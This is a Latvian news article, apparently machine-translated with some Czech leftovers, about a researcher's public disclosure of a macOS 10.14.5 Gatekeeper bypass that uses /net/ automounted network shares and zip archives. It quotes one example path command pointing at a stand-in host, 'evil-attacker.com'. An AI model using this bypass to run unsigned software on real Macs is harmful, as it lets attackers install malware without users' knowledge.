Ļaunprātīgu lietotni Mac datorā ir viegli instalēt. Apple kļūdu nav izlabojis pat pēc trim mēnešiem

27. 5. 2019

Drošības pētnieks Filipo Kavalarins savā emuārā ievietoja brīdinājumu par kļūdu operētājsistēmā macOS 10.14.5. Tas ietver iespēju pilnībā apiet Gatekeeper drošības pasākumus. Pēc Kavallarina teiktā, viņš Apple uz kļūdu norādīja jau šī gada februārī, taču uzņēmums to nav izlabojis jaunākajā atjauninājumā.

Gatekeeper izstrādāja Apple un pirmo reizi iekļāva tās galddatoru operētājsistēmā 2012. gadā. Tas ir mehānisms, kas neļauj lietojumprogrammai darboties bez lietotāja ziņas un piekrišanas. Kad esat lejupielādējis lietotni, Gatekeeper automātiski pārbauda tās kodu, lai noskaidrotu, vai Apple ir pareizi parakstījis programmatūru.

Savā emuāra ierakstā Cavallarin atzīmē, ka Gatekeeper pēc noklusējuma uzskata gan ārējo krātuvi, gan tīkla koplietojumus par drošām vietām. Tāpēc jebkuru lietojumprogrammu, kas atrodas šajos mērķos, var automātiski palaist, neveicot Gatekeeper pārbaudi. Tieši šo funkciju var izmantot, lai palaistu ļaunprātīgu programmatūru bez lietotāja ziņas.

Viens no aspektiem, kas pieļauj nesankcionētu piekļuvi, ir automātiskās pievienošanas funkcija, kas ļauj lietotājiem automātiski pievienot tīkla koplietojumu, vienkārši norādot ceļu, kas sākas ar "/net/". Kā piemēru Cavallarin min ceļu "ls /net/evil-attacker.com/sharedfolder/", kas var likt operētājsistēmai ielādēt mapes "sharefolder" saturu attālā vietā, kas var būt potenciāli ļaunprātīga.

To, kā draudi darbojas, varat noskatīties video:

Vēl viens faktors ir fakts, ka, ja tiek koplietots zip arhīvs, kurā ir noteikta saite, kas ved uz automātiskās pievienošanas funkciju, Gatekeeper to nepārbaudīs. Tādā veidā upuris var viegli lejupielādēt ļaunprātīgo arhīvu un to izpakot, ļaujot uzbrucējam bez lietotāja ziņas palaist praktiski jebkuru programmatūru Mac datorā. Finder, kas pēc noklusējuma slēpj noteiktus paplašinājumus, arī ir daļa no šīs ievainojamības.

Kavalarins savā emuārā norāda, ka Apple uzmanību uz macOS operētājsistēmas ievainojamību vērsa šī gada 22.februārī. Taču maija vidū Apple pārtrauca sazināties ar Cavallarin, tāpēc Cavallarin nolēma visu publiskot.

Avots: FCVL

Tēmas: uzglabāšana, automātiska, MacOS, video, nastavení, funkciju, lietotājs, aplikace, Manzana

Raksta diskusija

vāze jméno

Jūsu komentārs

Aizpildot iepriekš minētos datus, es atzīstu, ka uzņēmums TEXT FACTORY s.r.o., juridiskā adrese Brno, Durďákova 336/29, Černá Pole, pasta indekss: 613 00, ID numurs: 06157831, reģistrēts Brno apgabaltiesā, C sadaļā , ievietojiet 100399, apstrādās manus personas datus, kas norādīti manis aizpildītajā reģistrācijas veidlapā, pamatojoties uz TEXT FACTORY s.r.o. likumīgajām interesēm saskaņā ar 6. panta 1. punkta vēstuli. f) GDPR un lai izpildītu juridiskās saistības (VDAR 6. panta 1. punkta c) apakšpunkts), šādos nolūkos: nepieciešamība nodrošināt TEXT FACTORY s.r.o. pārvaldīto vietņu apmeklētāju pilnvarošanu, lai aktīvi veicinātu publicētos rakstus vai diskusiju. forumos un izmantojot TEXT FACTORY s.r.o. kā šo diskusiju forumu administratora tiesības. Plašāku informāciju par personas datu apstrādi un tiesībām var atrast Nodarbības par personas datu aizsardzību. visu tekstu

Tas varētu būt jūs interesē

Saistīts